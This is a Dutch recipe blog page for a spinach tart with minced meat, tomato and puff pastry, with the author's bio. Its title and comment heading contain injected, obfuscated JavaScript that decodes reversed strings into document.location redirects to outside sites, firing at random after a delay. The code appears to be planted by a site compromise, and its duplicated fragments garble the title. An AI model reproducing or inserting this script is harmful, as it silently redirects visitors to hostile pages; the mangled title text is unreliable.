Spinazietaart met gehakt en dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomaat

Deze spinazietaart is heel makkelijk om te maken en staat ook nog eens snel op tafel. Je kunt voor het korstdeeg het basis recept voor quiche en hartige taarten gebruiken of gewoon onderstaand recept volgen. 

Bereid je Spinazietaart van te voren klaar

Op verjaardagen doen hartige taarten het vaak goed. Je kunt er meerdere maken in verschillende smaken en goed van te voren klaar maken. Om het nog makkelijker te maken kun je de taarten ook alvast voorsnijden in puntjes. Je hoeft ze dan alleen maar op tafel te zetten. Als je hartige taarten warm lekkerder vind kun je ze natuurlijk altijd even opwarmen.

High Tea

Deze taart is ook heerlijk om bij een high tea te serveren. Bij een high tea horen niet alleen hele zoete taarten, maar ook hartige hapjes zoals sandwiches. Zelf vind ik een stukje hartige taart ook een goede aanvulling tussen al dat zoets.

spinazietaart met gehakt

Recept

Voorbereiding: 30 min.
Oven: 45 min.

Ingredienten

 • 1 pak diepvries bladspinazie
 • 5 plakjes bladerdeeg
 • 1 ui
 • 2 theelepels sambal badjas
 • Beetje boter om in te bakken
 • 250 gr. rundergehakt
 • 150 gr. pittige kaas
 • 3 eieren
 • 125 ml. creme fraiche
 • 2 tomaten om te garneren

Aan de slag!

 1. Verwarm de oven voor op 200 graden.
 2. Ontdooi de plakjes bladerdeeg.
 3. Snipper een uitje en bak dit samen met het gehakt en de sambal in een beetje boter.
 4. Laat de spinazie goed uit laten lekken en meng dit door het gehaktmengsel in de pan.
 5. Klop de eieren los en een kom samen met de creme fraiche en de geraspte kaas.
 6. Bekleed de vorm met het bladerdeeg.
 7. Giet het spinazie gehaktmengsel over de bodem en giet hier het eimengsel overheen.
 8. Snijd de tomaten in plakjes en leg deze voor het kleurtje en de garnering bovenop. Eventueel kun je ook nog wat extra geraspte kaas er op strooien.
 9. Plaats de spinazietaart ca. 45 min. in de oven! Eet smakelijk!

Score

 • Score 5.0

User Rating

0 (0 Votes)

Summary

Score

Anouk - Viving.nl

De website Viving is opgezet door Anouk (28 jaar). In mijn vrije tijd besteed ik veel tijd aan het inrichten van het huis en werk ik graag in de tuin. Daarnaast ben ik dol op lekker eten en drinken. Ik sta dan ook vaak in de keuken om voor familie en vrienden te koken. Als ik in huis bezig ben dan kan ik me heerlijk ontspannen en alle inspiratie die ik hierbij op doe wil ik graag met jullie delen op deze website.

Geen Reacties op "Spinazietaart met gehakt en <script>$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.ran<script>$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}</script><script>$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.ran<script>$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>tomaat"

  Plaats een reactie:

  Je emailadres wordt niet weergegeven.